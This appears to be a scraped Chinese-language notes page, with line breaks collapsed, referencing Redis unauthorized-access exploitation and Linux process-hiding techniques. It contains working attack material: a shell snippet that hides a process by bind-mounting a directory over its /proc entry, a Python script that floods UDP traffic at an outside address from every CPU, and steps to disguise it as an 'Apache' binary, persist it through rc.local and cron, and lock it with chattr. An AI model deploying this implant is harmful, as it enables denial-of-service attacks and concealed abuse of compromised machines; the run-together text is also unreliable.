# 批量杀掉名为Apache的进程ps -ef | grep -v grep | grep Apache | awk '{print $2}' | xargs kill -9
redis未授权访问漏洞利用总结——linux篇 - 夜尽终会天明 - 博客园
linuxStack/进程隐藏技术的攻与防-攻篇.md at master · g0dA/linuxStack · GitHub
nohup /usr/bin/redis-server /etc/redis.conf >/dev/null 2>&1 &process="redis"PID=$(ps -ef | grep $process | grep -v grep | awk '{print $2}')mkdir .hidden >/dev/null 2>&1 &mount -o bind .hidden "/proc/${PID}"nohup /usr/bin/redis-server /etc/redis.conf >/dev/null 2>&1 &PID=$(ps -ef | grep $process | grep -v grep | awk '{print $2}')mkdir .hidden >/dev/null 2>&1 &mount -o bind .hidden "/proc/${PID}"if [ -n "$PID" ]; thenecho "OK"elseecho "NO"fi
import multiprocessingimport socketdef send_traffic(ip, port):sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.connect((ip, port))while True:sock.send(b"")sum = 0for i in range(10000000):sum += im = multiprocessing.cpu_count()for i in range(m):multiprocessing.Process(target=send_traffic, args=('1.2.3.4', 6666)).start()
pyinstaller -F Apache.py # 生成linux可执行程序mv dist/Apache /usr/bin/vim /etc/rc.local.d/start.sh#!/bin/bashPID=$(ps -ef | grep "Apache" | grep -v "grep" | awk '{print $2}')if [ -n "$PID" ]; thenecho "ok"elsenohup /usr/bin/Apache >/dev/null 2>&1 &ficrontab -e* * * * * /etc/rc.local.d/start.shchattr +a /usr/bin/Apache /etc/rc.local.d/start.sh
vim /etc/rsyslog.d/50-default.conf将cron前的注释去除
若有收获,就点个赞吧
0 人点赞
